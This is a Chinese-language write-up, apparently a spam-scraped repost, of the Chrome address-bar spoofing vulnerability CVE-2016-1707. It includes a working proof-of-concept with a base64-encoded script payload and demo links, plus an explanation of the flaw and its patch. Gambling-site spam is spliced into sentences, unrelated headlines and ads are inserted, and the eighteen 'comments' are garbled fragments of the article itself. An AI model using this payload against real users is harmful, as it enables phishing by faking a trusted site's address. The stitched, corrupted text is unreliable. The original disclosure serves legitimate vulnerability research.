导语

  Chrome浏览器地址栏欺骗漏洞(CVE-2016-1707),这个漏洞笔者于2016年6月报告给Google,现在把漏洞细节分享给大家。URL Spoofing漏洞可以伪造一个合法的网站地址。攻击者可以利用这个漏洞对用户发起网络钓鱼攻击。

  受影响版本:

  Chrome < v52.亚博0.亚博APP2743.82,IOS < v10

  漏洞详情

  

  POC:

  <>

  payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=";

  functionpwned() {

  vart = window.open('https://www.gmail.com/', 'aaaa');

  t.document.write(atob(payload));

  t.document.write("<h1>Address bar says [url]https://www.gmail.com/[/url] - this is NOT [url]https://www.gmail.com/</h1>[/url]");

  }

  </>

  <a href="https://hack.com::/"target="aaaa">click me</a><br>

  那么这个漏洞是亚博app下载页如何发生的呢?笔者现在来解读一下整个代码的加载过程。首先点击click me这个链接,浏览器去打开一个name为aaaa的新窗口,这个页面去加载“https://hack.com::”,这个地址可以随便写。500微秒后运行pwned(),在aaaa窗口打开https://www.gmail.com,当然这个URL可以为空。到现在为止,一切代码运行都很正常,接下来这段代码就是触发漏洞的核心代码。

  加密的这段代码:

   payload code:

  接下来这段代开始在aaaa窗口页面去提交(commit)https://gmail.com::,这是一个很奇妙的事情,https://gmail.com::本是一个无效的地址,如何去被提交呢。在尝试了亚博app下载地址多种方法后,笔者发现使用a标签点击的方式可以做到(window.open/location则不可以),并且使这个无效地址处在了一个等待状态(pending status)。此时,实际Chrome是加载了about:blank(已经到了about:blank域),但在处理最后URL地址栏中的显示时,Chrome却选择了处在等待状态的https://gmail.com:: 作为最后的提交地址,加载后的https://gmail.com::在URL地址栏中会以https://gmail.com这样的方式呈现,两个::会被隐藏。此时,整个加载过程完成。一个完美的URL Spoofing漏洞就这样产生了。

  Online demo:

  https://xisigr.com/test/spoof/chrome/1.html

  https://xisigr.com/test/spoof/chrome/2.html

  如果你还没有升级版本,Chrome < v52.0.2743.82,IOS < v10,那么可以尝试运行笔者网站上的这两个DEMO。

  如何修复

  这个漏洞最关键的地方是,Chrome允许在Web页面加载的时候,提交一个无效的地址所导致。Google也是基于此给出了补丁文件,就是在加载Web页面的时候不允许提交无效地址,如果检测到是无效地址,则直接使当前URL为about:blank。

  [self optOutScrollsToTopForSubviews];

  相关链接

  [1] https://googlechromereleases.blo ... channel-update.html

  [2] https://bugs.chromium.org/p/chromium/issues/detail?id=622183

  [3] https://chromium.googlesource.co ... 6c88304ec504e909fd5

  作者:xisigr

  来自:腾讯玄武实验室

炼石信息安全培训春季班开招

进球无效!VAR视频裁判介入,裁定越位在先,进球被判无效!

QQ:495066536

372806985

敬请持续关注……

发布评论
亚博-卡昂主场大胜图卢兹,提振保级信心
18 条回复
  1. 谢宇英
    (2024-10-21 23:08:07)

    ar says [url]https://www.gmail.com/[/url] - this is NOT [url]https://www.gmail.com/</h1>[/url

  2. 吴强东
    (2025-01-24 08:19:27)

    ttps://hack.com::/"target="aaaa">click me</a><br>  那么这个漏洞是如何发生的呢?笔者现在来解读一下整个代码的加载过程。首先点击click me这个链接,浏览器去打

  3. 何超宁
    (2024-11-15 17:50:13)

    Spoofing漏洞就这样产生了。  Online demo:  https://xisigr.com/test/spoof/chrome/1.html  https://xisigr.com/test/spoof/chrome/2.html  如果你还

  4. 程娜欣
    (2025-02-15 17:44:23)

    洞的核心代码。  加密的这段代码:   payload code:  接下来这段代开始在aaaa窗口页面去提交(commit)https://gmail.com::,这是一个很奇妙的事情,https

  5. 刘宇思
    (2025-01-30 20:56:06)

    10  漏洞详情    POC:  <>  payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGlua

  6. 张静泽
    (2024-12-15 15:25:55)

    奇妙的事情,https://gmail.com::本是一个无效的地址,如何去被提交呢。在尝试了多种方法后,笔者发现使用a标签点击的方式可以做到(window.open/location则不可以),

  7. 徐莉成
    (2025-03-05 01:57:17)

    f/chrome/1.html  https://xisigr.com/test/spoof/chrome/2.html  如果你还没有升级版本,Chrome < v52.0.2743.82

  8. 吴峰安
    (2025-02-23 22:18:01)

    https://bugs.chromium.org/p/chromium/issues/detail?id=622183  [3] https://chromium.googlesource.co ... 6c88304ec504e909fd5 

  9. 吕琳英
    (2024-12-01 20:09:38)

    st/spoof/chrome/1.html  https://xisigr.com/test/spoof/chrome/2.html  如果你还没有升级版本,Chrome < v52.0.2743.82,IOS < v10,那么可以尝试运行笔者网站上的

  10. 张宇泽
    (2025-01-04 01:40:37)

    并且使这个无效地址处在了一个等待状态(pending status)。此时,实际Chrome是加载了about:blank(已经到了about:blank域),但在处理最后URL地址栏中的显示时,Chrome却选择了处在等待状态的https://gmail.com:: 作为最后的提交地址,加载

  11. 王婷辉
    (2025-01-31 05:54:25)

    lesource.co ... 6c88304ec504e909fd5  作者:xisigr  来自:腾讯玄武实验室炼石信息安全培训春季班开招QQ:4950665363

  12. 宋敏华
    (2025-04-10 13:13:45)

    vY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZCh

  13. 马峰思
    (2024-10-30 19:00:20)

    write("<h1>Address bar says [url]https://www.gmail.com/[/url] - this is NOT [url]https://www.gmail.com/</h1>[/url]");  }  </>

  14. 吴玉远
    (2024-11-29 20:29:48)

    72806985敬请持续关注……

  15. 谢玉东
    (2024-12-10 20:52:53)

    段代开始在aaaa窗口页面去提交(commit)https://gmail.com::,这是一个很奇妙的事情,https://gmail.com::本是一个无效的地址,如何去被提交呢。在尝试了多种方法后,笔者发现使用a标签点击的方式可以做到(window.open/location则不可以),

  16. 吕艳明
    (2025-04-24 04:58:06)

    =";  functionpwned() {  vart = window.open('https://www.gmail.com/', 'aaaa');  t.document.write(atob(payload));  t.document.write("<h1>Address

  17. 马伟雪
    (2024-11-18 12:54:28)

     那么这个漏洞是如何发生的呢?笔者现在来解读一下整个代码的加载过程。首先点击click me这个链接,浏览器去打开一个name为aaaa的新窗口,这个页面去加载“https://hack.com::”,这个地址可以随便写。50

  18. 谢涛安
    (2025-01-16 20:03:39)

    isigr.com/test/spoof/chrome/2.html  如果你还没有升级版本,Chrome < v52.0.2743.82,IOS < v10,那么可以尝试运行笔者网站上的这两个DEMO。  如何修复  这个漏洞最关键的地方是,Chrome允许

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。